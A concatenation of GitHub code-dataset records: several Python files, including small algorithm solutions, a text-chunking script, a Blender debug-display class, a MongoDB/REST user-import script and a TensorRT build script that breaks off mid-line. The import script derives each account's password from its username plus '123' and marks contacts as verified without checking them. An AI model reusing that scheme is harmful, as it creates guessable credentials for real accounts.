self.psf_comp()\n\n return cost\n","repo_name":"dedale-fet/Distributed-Learning-Toolbox","sub_path":"Distributed Space Variant Deconvolution/lib/cost.py","file_name":"cost.py","file_ext":"py","file_size_in_byte":4529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41528387637","text":"from collections import Counter as c\n\ninputWord = input()\nret = -1\nseparatedWord = c(inputWord)\n\n##print(separatedWord)\n\nfor idx,keyWord in enumerate(separatedWord):\n if(separatedWord.get(keyWord)==1):\n ret = idx\n ##print(ret)\n break\n\nprint(ret)\n\n## 시간 복잡도 o(n)\n## 공간 복잡도 o(1) -> 알파벳\n## Constraints:\n# 1 <= s.length <= 10^5\n# s consists of only lowercase English letters.","repo_name":"beomsun1234/TIL","sub_path":"algorithm/leetcode/387. First Unique Character in a String(optimal).py","file_name":"387. First Unique Character in a String(optimal).py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37031525466","text":"#! 
/usr/bin/env python3\n\n# Make the transcript from POM lectures into 4096 words\n# Made this script to get around ChatGPT's token limit per prompt...\nimport sys\n\n\ndef main():\n if (len(sys.argv) < 2):\n print(\"Usage: ./pom_breaker.py file.txt\")\n exit(1)\n\n data = open(sys.argv[1]).read()\n data_len = len(data)\n times = data_len // 4096\n try:\n with open(\"out.txt\", \"w\") as file:\n ptr = 0\n for i in range(times):\n file.write(data[ptr: ptr + 4096] + '\\n')\n ptr += 4096\n file.write(data[ptr:] + '\\n')\n except Exception:\n print(\"Hehe\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gdnand/scripts","sub_path":"pom_breaker.py","file_name":"pom_breaker.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70777284922","text":"import csv\n\nimport requests\nimport math\nimport os\nimport re\nimport random\nfrom pymongo import MongoClient\n# import MySQLdb\nfrom datetime import datetime,timedelta\nfrom bson.objectid import ObjectId\n# from constants import *\nimport logging \n \n#Create and configure logger \nlogging.basicConfig(filename=\"newfile.log\", \n\t\t\t\t\tformat='%(asctime)s %(message)s', \n\t\t\t\t\tfilemode='w') \n#Creating an object \nlogger=logging.getLogger() \n#Setting the threshold of logger to DEBUG \nlogger.setLevel(logging.DEBUG)\n\nclass CreateUserTables:\n\tdef __init__(self, env):\n\t\ttry:\n\t\t\tif env:\n\t\t\t\tpass\n\t\t\t\t#for live enviroment\n\t\t\t\t#self.client = MongoClient(\"localhost\", 27017)\n\t\t\t\t#self.db = client.test_clickg\n\t\t\t\t#self.cgusernew = db.activity_cgusernew\n\t\t\telse:\n\t\t\t\tself.client = MongoClient(\"localhost\", 27017)\n\t\t\t\tself.db_cust = self.client.customer\n\t\t\t\tself.db_misc = self.client.cc_miscellaneous\n\t\t\t\tself.user_profile = self.db_cust.cc_user_profile\n\t\t\t\tself.user_account = self.db_cust.cc_user_account\n\t\t\t\tself.area_collection = self.db_misc.cc_area\n\t\t\t\t#connect to mysql\n\t\t\t\t# self.mysql_db = MySQLdb.connect(\"localhost\", \"lsp\", \"root\", \"root\")\n\t\t\t\t# self.mysql_cursor = self.mysql_db.cursor()\n\t\texcept:\n\t\t\tprint(\"could not connect with the db please check\")\n\t\telse:\n\t\t\tprint('connection established')\n\n\tdef get_aplha_username(self,val):\n\t\tgarbage_char = \"?.!/;:@$0123456789_()[]\"\n\t\tif not val.isalpha():\n\t\t\tfor char in garbage_char:\n\t\t\t\tval = val.replace(char,\"\")\n\t\treturn val\n\n\tdef c_user_profile(self, user=None):\n\t\twith open('/home/gautam/Downloads/lsp_deatils.csv', newline='') as csvfile:\n\t\t\treader = csv.DictReader(csvfile)\n\t\t\tfor row in reader:\t\t\t\t\n\t\t\t\t# if not row['GSTIN']:\n\t\t\t\t# \trow['GSTIN'] = None\n\t\t\t\t# if not row['PAN']:\n\t\t\t\t# \trow['PAN'] = None\n\t\t\t\tactive_status = True\n\t\t\t\tsp_business_name = row['sp_business_name'].lower()\n\t\t\t\tif row['Address']:\n\t\t\t\t\taddress = row['Address'].lower()\n\t\t\t\telse:\n\t\t\t\t\t#active_status = False\n\t\t\t\t\taddress = None\n\t\t\t\t# carcrewpoc = row['CarcrewPOC'].lower()\n\t\t\t\tsp_poc_name = row['sp_poc_name'].lower()\n\t\t\t\tif row['Source']:\n\t\t\t\t\temail = row['Source'].lower().strip(' ')\n\t\t\t\t\temail = None\n\n\t\t\t\tarea_id = None\n\t\t\t\tif row['cc_area_name']:\n\t\t\t\t\tif row['PinCode']:\n\t\t\t\t\t\tprint(\"pincode\")\n\t\t\t\t\t\tarea_details = self.area_collection.find({\n\t\t\t\t\t\t\t\"cc_area_name\":row['cc_area_name'],\n\t\t\t\t\t\t\t\"cc_area_pin_code\": row['PinCode'] 
\n\t\t\t\t\t\t})\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"missing pincode\")\n\t\t\t\t\t\tarea_details = self.area_collection.find({\n\t\t\t\t\t\t\t\"cc_area_name\":row['cc_area_name']\n\t\t\t\t\t\t})\n\n\t\t\t\t\tfor a in area_details:\n\t\t\t\t\t\tarea_id = str(a['_id'])\n\t\t\t\tinsert_lsp_data = {}\n\t\t\t\tinsert_lsp_data.update({\n\t\t\t\t\t'sp_cc_code' : None,\n\t\t\t\t\t'sp_business_name' : sp_business_name,\n\t\t\t\t\t'sp_business_pretty_name' : sp_business_name,\n\t\t\t\t\t'sp_business_addresses' : address,\n\t\t\t\t\t'sp_country_id' : '5c740b24e45cf77ac147a98a',\n\t\t\t\t\t'sp_state_id' : row['State'],\n\t\t\t\t\t'sp_city_id' : row['City'],\n\t\t\t\t\t'sp_area_id' : area_id,\n\t\t\t\t\t'sp_lat_code' : None,\n\t\t\t\t\t'sp_long_code' : None,\n\t\t\t\t\t'sp_registered_entity_name' : row['RegisteredEntityName'],\n\t\t\t\t\t'sp_registered_addresses' : None,\n\t\t\t\t\t'sp_is_rb_address_same' : False,\n\t\t\t\t\t'sp_gstin_number' : row['GSTIN'],\n\t\t\t\t\t'sp_pan_number' : row['PAN'],\n\t\t\t\t\t'sp_service_time_schedule' : None,\n\t\t\t\t\t'sp_service_off_day' : None,\n\t\t\t\t\t'sp_website_address' : None,\n\t\t\t\t\t'sp_poc_name' : sp_poc_name,\n\t\t\t\t\t'sp_poc' : row['sp_poc'],\n\t\t\t\t\t'sp_business_email' : row['Source'].lower(),\n\t\t\t\t\t'sp_service_up' : False,\n\t\t\t\t\t'sp_cc_category_type' : None,\n\t\t\t\t\t'sp_verfied_status' : None,\n\t\t\t\t\t'sp_is_verified' : False,\n\t\t\t\t\t'cc_project_id' : '5c740be7e45cf77ac07c27de',\n\t\t\t\t\t'cc_user_type_id' : row['Type'],\n\t\t\t\t\t'is_sp_published' : False,\n\t\t\t\t\t'is_active' : active_status,\n\t\t\t\t\t'cc_org_type_id' : None,\n\t\t\t\t\t'created_by' : row['created_by'],\t\t\t\t\n\t\t\t\t\t'updated_by' : row['updated_by']\n\t\t\t\t})\n\n\t\t\t\tlsp_resp = requests.post(\"http://127.0.0.1:8000/lsp-api/lsp-single\", \n\t\t\t\t\tjson=insert_lsp_data, headers={'content-type': 'application/json'})\n\n\n\t\t\t\tif lsp_resp.status_code == 201:\n\t\t\t\t\tsp_id = lsp_resp.json()['id']\n\n\t\t\t\t\t#enter data in user auth table for that lsp\n\t\t\t\t\tvalue = \"!d@$sfsdfsdf\"\n\t\t\t\t\tname_list = sp_business_name.split(\" \")\n\t\t\t\t\trand_no = random.randint(0, 9999)\n\t\t\t\t\tname_len = len(name_list)\n\t\t\t\t\tif name_len > 1:\n\t\t\t\t\t item = name_list[0]\n\t\t\t\t\t val = self.get_aplha_username(item)\n\t\t\t\t\t if not val:\n\t\t\t\t\t\t #item = name_list[1]\n\t\t\t\t\t\t val = self.get_aplha_username(name_list[1])\n\t\t\t\t\t if len(val) > 3:\n\t\t\t\t\t\t username = val[0:3]+'r'\n\t\t\t\t\t else:\n\t\t\t\t\t\t username = val+'v'\n\t\t\t\t\telif name_len == 1:\n\t\t\t\t\t\tval = self.get_aplha_username(name_list[0])\n\t\t\t\t\t\tif len(val) > 3:\n\t\t\t\t\t\t\tusername = val[0:3]+'u'\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tusername = val+'c'\n\t\t\t\t\trandom_str = ['yy', 'uu', 'jj', 'hh', 'kk','we','qq', 'w', 'e', 'm', 'b', 's','a', 'd', 'g', 'ds', 't', 'y', 'h', 'u', 'j', 'i', 'k', 'z', 'x', 'v', 'o', 'p']\n\t\t\t\t\tusername = username+random.choice(random_str)\n\t\t\t\t\tusername = username+'cclsp'+str(rand_no)\n\t\t\t\t\tuser_auth_data = {}\n\t\t\t\t\tuser_auth_data.update({\n\t\t\t\t\t\t'username' : username,\n\t\t\t\t\t\t'password' : username+'123',\n\t\t\t\t\t\t'email' : row['Source'],\n\t\t\t\t\t\t'cc_login_type' : 2,\n\t\t\t\t\t\t'cc_project_id' : '5c740be7e45cf77ac07c27de',\n\t\t\t\t\t\t'cc_user_type_id' : row['Type'], \n\t\t\t\t\t\t'cc_user_role' : \"lsp\",\n\t\t\t\t\t\t'object_id' : sp_id,\n\t\t\t\t\t\t'is_active' : active_status,\n\t\t\t\t\t\t'created_by' : row['created_by'],\t\t\t\t\n\t\t\t\t\t\t'updated_by' : row['updated_by']\n\t\t\t\t\t})\n\t\t\t\t\t\n\t\t\t\t\tauth_resp = 
requests.post(\"http://127.0.0.1:8000/login-api/user/\", \n\t\t\t\t\t\tjson=user_auth_data, headers={'content-type': 'application/json'})\n\n\t\t\t\t\tif auth_resp.status_code == 201:\n\t\t\t\t\t\tauth_id = auth_resp.json()['value']\n\t\t\t\t\t#user profile data insereted\n\t\t\t\t\t\tif name_len > 1:\n\t\t\t\t\t\t\titem = name_list[0]\n\t\t\t\t\t\t\tval = self.get_aplha_username(item)\n\t\t\t\t\t\t\tif not val:\n\t\t\t\t\t\t\t\tval = self.get_aplha_username(name_list[1])\n\t\t\t\t\t\t\t\tif not val:\n\t\t\t\t\t\t\t\t\tval = self.get_aplha_username(name_list[2])\n\t\t\t\t\t\t\tif len(val) > 10:\n\t\t\t\t\t\t\t first_name = val[0:10]\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t first_name = val\n\t\t\t\t\t\t\tother_item = name_list[-1]\n\t\t\t\t\t\t\tother_val = self.get_aplha_username(other_item)\n\t\t\t\t\t\t\tif not other_val:\n\t\t\t\t\t\t\t\tother_val = self.get_aplha_username(name_list[-2])\n\t\t\t\t\t\t\t\tif not other_val:\n\t\t\t\t\t\t\t\t\tother_val = self.get_aplha_username(name_list[-3])\n\t\t\t\t\t\t\t\telse:\t\n\t\t\t\t\t\t\t\t\tother_val = first_name\n\t\t\t\t\t\t\tif len(other_val) > 10:\n\t\t\t\t\t\t\t last_name = other_val[0:10]\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t last_name = other_val \n\t\t\t\t\t\telif name_len == 1:\n\t\t\t\t\t\t\titem = name_list[0]\n\t\t\t\t\t\t\tval = self.get_aplha_username(item)\n\t\t\t\t\t\t\tif not val:\n\t\t\t\t\t\t\t\tval = 'carcrew'\n\t\t\t\t\t\t\tfirst_name = val\n\t\t\t\t\t\t\tlast_name = val\n\n\t\t\t\t\t\tif len(first_name) <= 2:\n\t\t\t\t\t\t\tfirst_name = first_name+last_name\n\n\t\t\t\t\t\tif len(last_name) <= 2:\n\t\t\t\t\t\t\tlast_name = first_name+last_name\n\t\t\t\t\t\tfirst_name = first_name.lower()\n\t\t\t\t\t\tlast_name = last_name.lower()\n\t\t\t\t\t\t#add data to the user profile\n\t\t\t\t\t\tif row['Type'] != \"\":\n\t\t\t\t\t\t\tuser_type = ObjectId(row['Type'])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tuser_type = None\n\n\t\t\t\t\t\tuser_profile_data = {}\n\t\t\t\t\t\tuser_profile_data.update({\n\t\t\t\t\t\t\t\t'user_auth_id': auth_id,\n\t\t\t\t\t\t\t\t# 'user_auth_id': '',\n\t\t\t\t\t\t\t\t'first_name': first_name.lower(),\n\t\t\t\t\t\t\t\t'last_name': last_name.lower(),\n\t\t\t\t\t\t\t\t'mobile_no': row['sp_poc'],\n\t\t\t\t\t\t\t\t'email': row['Source'].lower(),\n\t\t\t\t\t\t\t\t'is_profile_verified': {\t\n\t\t\t\t\t\t\t\t\t\"is_email_verified\": True,\n\t\t\t\t\t\t\t\t\t\"is_phone_verified\": True,\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t'cc_project_id': ObjectId(\"5c740be7e45cf77ac07c27de\"),\n\t\t\t\t\t\t\t\t'cc_default_profile': True,\n\t\t\t\t\t\t\t\t'profile_type': 1,\n\t\t\t\t\t\t\t\t'profile_max_lock_limit': 0,\n\t\t\t\t\t\t\t\t'is_profile_active': True,\n\t\t\t\t\t\t\t\t'country_id': ObjectId(\"5c740b24e45cf77ac147a98a\"),\n\t\t\t\t\t\t\t\t'state_id': ObjectId(row['State']),\n\t\t\t\t\t\t\t\t'city_id': ObjectId(row['City']),\n\t\t\t\t\t\t\t\t'area_id': ObjectId(area_id),\n\t\t\t\t\t\t\t\t'cc_user_type_id': user_type,\n\t\t\t\t\t\t\t\t'created_by' : row['created_by'],\t\t\t\t\n\t\t\t\t\t\t\t\t'updated_by' : row['updated_by'],\n\t\t\t\t\t\t\t\t'is_active': active_status\n\t\t\t\t\t\t\t})\n\t\t\t\t\t\tuser_profile_id = self.user_profile.insert(user_profile_data)\n\t\t\t\t\t\tuser_account_data = {}\n\t\t\t\t\t\tif address:\n\t\t\t\t\t\t\taddress1 = address[0:50]\n\t\t\t\t\t\t\taddress2 = address[50:]\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\taddress1 = None\n\t\t\t\t\t\t\taddress2 = None\n\n\t\t\t\t\t\tuser_account_data.update({\n\t\t\t\t\t\t\t\t\t# 'user_account_id': user_details[''],\n\t\t\t\t\t\t\t\t\t'user_auth_id': 
auth_id,\n\t\t\t\t\t\t\t\t\t'user_profile_id': ObjectId(user_profile_id),\n\t\t\t\t\t\t\t\t\t'user_account_mobile_no': row['sp_poc'],\n\t\t\t\t\t\t\t\t\t'user_account_email': row['Source'].lower(),\n\t\t\t\t\t\t\t\t\t'user_account_full_name': first_name+' '+last_name,\n\t\t\t\t\t\t\t\t\t\"user_account_street_address\" : {\n\t\t\t\t\t\t\t\t\t\t\"address1\" : address1,\n\t\t\t\t\t\t\t\t\t\t\"address2\" : address2\n\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t'user_account_address_landmark': '',\n\t\t\t\t\t\t\t\t\t'country_id': ObjectId(\"5c740b24e45cf77ac147a98a\"),\n\t\t\t\t\t\t\t\t\t'state_id': ObjectId(row['State']),\n\t\t\t\t\t\t\t\t\t'city_id': ObjectId(row['City']),\n\t\t\t\t\t\t\t\t\t'area_id': ObjectId(area_id),\n\t\t\t\t\t\t\t\t\t'user_pin_code': row['PinCode'],\n\t\t\t\t\t\t\t\t\t'user_geo_code': {},\n\t\t\t\t\t\t\t\t\t'user_account_default': True,\n\t\t\t\t\t\t\t\t\t'user_account_type': 2,\n\t\t\t\t\t\t\t\t\t'cc_project_id': ObjectId(\"5c740be7e45cf77ac07c27de\"),\n\t\t\t\t\t\t\t\t\t'cc_user_type_id': user_type,\n\t\t\t\t\t\t\t\t\t'created_by' : row['created_by'],\t\t\t\t\n\t\t\t\t\t\t\t\t\t'updated_by' : row['updated_by'],\n\t\t\t\t\t\t\t\t\t'is_active': active_status\n\t\t\t\t\t\t\t\t})\n\t\t\t\t\t\tuser_account_id = self.user_account.insert(user_account_data)\n\t\t\t\t\telse:\n\t\t\t\t\t\tlogger.info({\"error for==> \" + sp_id :auth_resp.json()})\t\t\t\t\t\t\n\t\t\t\t\t\tprint({\"error for==> \" + sp_id :auth_resp.json()})\n\t\t\t\telse:\n\t\t\t\t\tlogger.info({\"error for==> \" + sp_business_name : lsp_resp.json()})\n\t\t\t\t\tprint({\"error for==> \" + sp_business_name : lsp_resp.json()})\n\t\t\t\t\t\t\t\nmig_user = CreateUserTables(0)\ncreate_user = mig_user.c_user_profile()","repo_name":"shrmasaurbh/scripts","sub_path":"lsp_import.py","file_name":"lsp_import.py","file_ext":"py","file_size_in_byte":9618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74681330039","text":"import bpy, bmesh\nimport numpy as np\nfrom mathutils import Vector, Matrix, Euler, Quaternion\n\nfrom .view import draw_display_view\nfrom .pixel import draw_display_px\nfrom .plot import Plot\n\n__all__ = ['Display']\n\n\nclass Display():\n \"\"\"\nThis is intended to help developing scripts by making\nit easyer to visualize things directly from scripts.\nLook in the 3DView N-Panel for the display options.\n\nusage:\n\ndspl = bpy.types.WindowManager.display\n\nThen in your script you can simply add stuff to visualize it.\nFor example:\n\nvecs = list of points\ndspl.add_points(vecs, 'list with my important points')\n\nwhen done or starting a new loop do\ndspl.clear() to clear all data\nor dspl.points.clear() for the subdicts.\n[points, edges, edge_chains, matrizies, eulers, quats, plots]\n\nAll objects are stored in a dictonary and can thus be overwritten\nor reaccessed later. The key is also the display name in the viewport.\n\nThe functions for adding all have a k (for key) value for this.\nIf it is unset the next free integer in the dict keys is used instead.\n\nUse dspl.set_transform(some_matrix) to transform all later added elements\nby that matrix (to put them into object-local-space). Alternatively use\ndspl.apply_transform(some_matrix, inv=False)\nto transform all those already set.\n\nFunctions for adding stuff:\nadd_point(point, k='')\nadd_points(points) # has no key. 
Is convinience to add a list of vecs\nadd_edge(edge, k='') --> edge = [point, point]\nadd_point_chain(points, k='') --> points = [point, point, ...]\nadd_matrix(matrix, k='')\nadd_euler(euler, k='')\nadd_quat(quat, k='')\nadd_bm(bm, k='') --> bm = BMesh\nadd_plotted_function(function, interval=[start, stop, step], k='')\nadd_plot(xvalues, yvalues, k='')\n\nWith add_plot you can visualize your own precomputed plots.\n\nPlotting of simple functions:\nThe function takes the interval as input args and plots the\nfunction output on y\n(function, interval[start, stop, step]], plot(key/display)name)\n\nPlot sinus:\ndspl.add_plotted_function(function=sin, interval=[0, 6, 0.1], k='sinus-plot')\nto overwrite the plot use same k value\n\nother example:\ndspl.add_plotted_function(lambda x: 1/(exp(x)),[-2 ,2, 0.1],0)\ndspl.add_plotted_function(lambda x: np.sin(x),[-np.pi ,np.pi, 0.1], k=1)\n\n\"\"\"\n draw_handle = []\n\n object_transform = Matrix()\n \n points = {}\n edges = {}\n point_chains = {}\n plots = {}\n matrizies = {}\n eulers = {}\n quats = {}\n bmeshs = {}\n\n display_view = draw_display_view\n display_px = draw_display_px\n\n def __init__(self):\n self.draw_start()\n\n def clear(self):\n \"\"\"Clear all display data.\"\"\"\n self.points.clear()\n self.edges.clear()\n self.point_chains.clear()\n self.plots.clear()\n self.matrizies.clear()\n self.eulers.clear()\n self.quats.clear()\n self.bmeshs.clear()\n \n self.tag_redraw_all_view3d()\n\n #SET \"ADDING\" TRANSFORM\n def set_transform(self, mat):\n \"\"\"mat: Matrix to transform the input by.\n Only points, edges and pointchains\"\"\"\n if type(mat) == Matrix:\n self.object_transform = mat\n\n #APPLY TRANFORM ON EXISTING ELEMENTS\n def apply_transform(self, mat=None, inv=False):\n \"\"\"Apply the transform (set in set_transform(matrix))\n to points, edges, point_chains.\n If mat is given apply that instead.\n inv: If True apply the invers\"\"\"\n if mat is None:\n mat = self.object_transform.copy()\n if inv:\n mat = mat.inverted()\n if self.points:\n for p in self.points.values():\n p[:] = mat * p\n if self.edges:\n for e in self.edges.values():\n e[:] = [mat * v for v in e]\n if self.point_chains:\n for chain in self.point_chains.values():\n chain[:] = [mat*v for v in chain]\n\n #ADD POINT\n def add_point(self, point, k=''):\n \"\"\"point: vector like iterable\n k: key(name) for the point\"\"\"\n if not k and type(k) == str:\n k = next_int_key(self.points.keys())\n try: hash(k)\n except: k = str(k)\n \n point = Vector(point).to_3d()\n point = self.object_transform * point\n self.points[k] = point\n\n self.tag_redraw_all_view3d()\n\n #ADD POINTS\n def add_points(self, points):\n \"\"\"Convinience add list of points\"\"\"\n for p in points:\n self.add_point(p)\n\n #ADD EDGE\n def add_edge(self, edge, k=''):\n \"\"\"edge: iterable thing with two vector like things\n k: key(name) for the edge\"\"\"\n if not k and type(k) == str:\n k = next_int_key(self.edges.keys())\n try: hash(k)\n except: k = str(k)\n \n edge = [Vector(v).to_3d() for v in edge]\n edge =[self.object_transform * v for v in edge]\n if (edge[0] - edge[1]).length == 0:\n return\n self.edges[k] = edge\n\n self.tag_redraw_all_view3d()\n\n #ADD EDGES\n def add_edges(self, edges):\n \"\"\"Convinience add list of edges\"\"\"\n for e in edges:\n self.add_edge(e)\n\n #ADD POINT CHAIN\n def add_point_chain(self, points, k=''):\n \"\"\"points: list of vector like things\n k: key(name) for the point chain\"\"\"\n if not k and type(k) == str:\n k = next_int_key(self.point_chains.keys())\n 
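# --- Hedged illustration (added; not part of the dataset record above). The
# add_* methods in this class all share one key-defaulting pattern: an omitted
# key becomes the next free integer, and unhashable keys fall back to str().
# A minimal standalone sketch of that pattern; _next_int_key here mirrors the
# next_int_key helper defined at the bottom of this module.
def _next_int_key(keys):
    nums = [int(k) for k in keys if str(k).lstrip('-').isdigit()]
    return max(nums) + 1 if nums else 0

_store = {}

def _add_item(value, k=''):
    if not k and type(k) == str:
        k = _next_int_key(_store.keys())
    try:
        hash(k)
    except TypeError:
        k = str(k)
    _store[k] = value

_add_item('a'); _add_item('b', k='named'); _add_item('c')
assert set(_store) == {0, 1, 'named'}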
try: hash(k)\n except: k = str(k)\n \n points = [Vector(v).to_3d() for v in points]\n points = [self.object_transform * v for v in points]\n self.point_chains[k] = points\n\n self.tag_redraw_all_view3d()\n\n #ADD MATRIX\n def add_matrix(self, mat, k=''):\n \"\"\"mat: Matrix type\n k: key(name) for the matrix\"\"\"\n if not k and type(k) == str:\n k = next_int_key(self.matrizies.keys())\n try: hash(k)\n except: k = str(k)\n \n if type(mat) == Matrix:\n self.matrizies[k] = mat\n\n self.tag_redraw_all_view3d()\n\n #ADD EULER\n def add_euler(self, euler, k=''):\n \"\"\"euler: Euler type\n k: key(name) for the Euler\"\"\"\n if not k and type(k) == str:\n k = next_int_key(self.eulers.keys())\n try: hash(k)\n except: k = str(k)\n \n if type(euler) == Euler:\n self.eulers[k] = euler\n\n self.tag_redraw_all_view3d()\n\n #ADD QUATERNION\n def add_quat(self, quat, k=''):\n \"\"\"quat: Quaternion type\n k: key(name) for the Quaternion\"\"\"\n if not k and type(k) == str:\n k = next_int_key(self.quats.keys())\n try: hash(k)\n except: k = str(k)\n \n if type(quat) == Quaternion:\n self.quats[k] = quat\n\n self.tag_redraw_all_view3d()\n\n #ADD BMESH\n def add_bm(self, bm, k=''):\n \"\"\"bm: BMesh type\n k: key(name) for the bmesh\"\"\"\n if not k and type(k) == str:\n k = next_int_key(self.bmeshs.keys())\n try: hash(k)\n except: k = str(k)\n if not isinstance(bm, bmesh.types.BMesh):\n print('Not a bmesh type', str(bm))\n return\n bm.verts.ensure_lookup_table()\n bm.edges.ensure_lookup_table()\n bm.faces.ensure_lookup_table()\n\n self.bmeshs[k] = bm\n\n self.tag_redraw_all_view3d()\n\n #ADD PLOTTED FUNCTION\n def add_plotted_function(self, function, interval=[0, 1, 0.1], k=''):\n \"\"\"function: some function with a single float input/output\n interval: [start, stop, step] for the input to function\n k: key(name) for the plot\"\"\"\n if not k and type(k) == str:\n k = next_int_key(self.plots.keys())\n try: hash(k)\n except: k = str(k)\n \n xvalues = np.arange(*interval)\n yvalues = [function(x) for x in xvalues]\n pl = Plot(xvalues, yvalues, name=str(k))\n self.plots[k] = pl\n \n self.tag_redraw_all_view3d()\n\n #ADD PLOT\n def add_plot(self, xvalues, yvalues=None, k=''):\n \"\"\"Add some precomputed values to a plot.\n If yvalues are None xvalues is used for y,\n x is then arange over [0, max(y)).\"\"\"\n if not k and type(k) == str:\n k = next_int_key(self.plots.keys())\n try: hash(k)\n except: k = str(k)\n\n if yvalues is None:\n yvalues = xvalues\n if callable(yvalues): yvalues = yvalues()\n xvalues = np.arange(0, np.max(yvalues), np.max(yvalues)/len(yvalues))\n\n if not (all(np.isfinite(xvalues)) and all(np.isfinite(yvalues))):\n print('Not all finite numbers in plot. 
Aborting.')\n return\n\n pl = Plot(xvalues, yvalues, name=str(k))\n self.plots[k] = pl\n \n self.tag_redraw_all_view3d()\n\n ### INTERNAL FUNCTIONS\n def create_edge_list(self, points=[]):\n \"\"\"Returns the edges combining the list of points\"\"\"\n points = [list(v) for v in points]\n points = [Vector(v).to_3d() for v in points]\n points = [self.object_transform * v for v in points]\n edge_list = list(zip(points[:-1], points[1:]))\n return edge_list\n\n @classmethod\n def tag_redraw_all_view3d(self):\n context = bpy.context\n for window in context.window_manager.windows:\n for area in window.screen.areas:\n if area.type == 'VIEW_3D':\n for region in area.regions:\n if region.type == 'WINDOW':\n region.tag_redraw()\n\n def draw_start(self):\n SpaceView3D = bpy.types.SpaceView3D\n if self.draw_handle:\n return\n\n print('Starting Development Display Drawing')\n handle_pixel = SpaceView3D.draw_handler_add(self.display_px, (), 'WINDOW', 'POST_PIXEL')\n handle_view = SpaceView3D.draw_handler_add(self.display_view, (), 'WINDOW', 'POST_VIEW')\n self.draw_handle[:] = [handle_pixel, handle_view]\n\n self.tag_redraw_all_view3d()\n\n def draw_stop(self):\n SpaceView3D = bpy.types.SpaceView3D\n if not self.draw_handle:\n return\n\n print('Stopping Development Display Drawing')\n handle_pixel, handle_view = self.draw_handle\n SpaceView3D.draw_handler_remove(handle_pixel, 'WINDOW')\n SpaceView3D.draw_handler_remove(handle_view, 'WINDOW')\n self.draw_handle[:] = []\n\n self.tag_redraw_all_view3d()\n\n def __call__(self):\n if self.draw_handle:\n self.draw_stop()\n elif not self.draw_handle:\n self.draw_start()\n\n def __repr__(self):\n return 'Points: %d, Edges: %d, PointChains: %d,\\nMatrizies: %d, Eulers: %d, Quaternions: %d,\\nPlots: %d'%(\n len(self.points), len(self.edges), len(self.point_chains), len(self.matrizies),\n len(self.eulers), len(self.quats), len(self.plots))\n\n### UTILS\ndef next_int_key(keys):\n nums = []\n for k in keys:\n try:\n num = int(k)\n nums.append(num)\n except:\n pass\n if nums:\n return sorted(nums)[-1] + 1\n return 0\n\n","repo_name":"PyrokinesisStudio/development_display","sub_path":"display_class.py","file_name":"display_class.py","file_ext":"py","file_size_in_byte":11017,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"1452183972","text":"def solution(msg):\n answer = []\n findDict = {}\n\n for idx, val in enumerate(range(ord(\"A\"), ord(\"Z\")+1), start=1):\n findDict[chr(val)] = idx\n\n start = 0\n end = len(msg)\n\n while True:\n a = msg[start:end]\n if a in findDict:\n answer.append(findDict[a])\n if end >= len(msg):\n return answer\n else:\n findDict[a+msg[end]] = len(findDict) + 1\n start += len(a)\n end = len(msg)\n else:\n end -= 1","repo_name":"kimyenac/Algorithm","sub_path":"프로그래머스/lv2/17684. 
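# --- Hedged note (added; not part of the dataset record above). Worked example
# for the LZW-style solution(msg) defined above, using the kata's published
# sample with the initial dictionary A..Z -> 1..26:
#   emit K(11), register KA=27; emit A(1), register AK=28;
#   emit KA(27), register KAK=29; emit O(15).
assert solution("KAKAO") == [11, 1, 27, 15]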
[3차] 압축/[3차] 압축.py","file_name":"[3차] 압축.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8439311018","text":"import argparse\nimport logging\nimport json\nimport torch\nimport sys\nimport torch_tensorrt\n\nfrom nlp_pipeline.model import get_model, get_onnx_session\nfrom nlp_pipeline.tokenizer import get_tokenizer\nfrom nlp_pipeline.utils import load_config, set_log_path, get_args\nfrom nlp_pipeline.label import get_label_to_id\nfrom nlp_pipeline.dataset import get_feature_class\nfrom nlp_pipeline.dataset.utils import get_model_inputs\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef build_jit_trace(args):\n args = load_config(args=args)\n set_log_path(args.output_dir)\n tokenizer = get_tokenizer(args=args)\n feature_class = get_feature_class(args)\n\n label_to_id, label_to_id_inv = get_label_to_id(tokenizer, args)\n args.label_to_id = label_to_id\n args.label_to_id_inv = label_to_id_inv\n\n data_dict = json.load(open(args.data_dir / args.data_config['test'], \"r\"))[0]\n feature = feature_class(\n data_dict=data_dict, tokenizer=tokenizer, args=args, diagnosis=False\n )\n\n feature_dict = feature.feature_dict\n model = get_model(args=args)\n model.set_return_logits()\n\n batch = dict()\n for col in feature_dict:\n batch[col] = torch.stack([feature_dict[col]], dim=0).to(torch.int32).to(args.device)\n print(batch[col].device)\n if 'label' in batch:\n del batch['label']\n\n x = tuple([batch[col].squeeze(-1) for col in batch])\n traced_model = torch.jit.trace(model, x)\n traced_model.save(\n args.model_dir / \"traced_model.ts\"\n )\n logger.info(\"***** Build traced model succeeded. *****\")\n return traced_model\n\ndef build_tensorrt(args, traced_model, fp=16):\n args = load_config(args=args)\n set_log_path(args.output_dir)\n tokenizer = get_tokenizer(args=args)\n feature_class = get_feature_class(args)\n\n label_to_id, label_to_id_inv = get_label_to_id(tokenizer, args)\n args.label_to_id = label_to_id\n args.label_to_id_inv = label_to_id_inv\n\n data_dict = json.load(open(args.data_dir / args.data_config['test'], \"r\"))[0]\n feature = feature_class(\n data_dict=data_dict, tokenizer=tokenizer, args=args, diagnosis=False\n )\n\n feature_dict = feature.feature_dict\n\n batch = 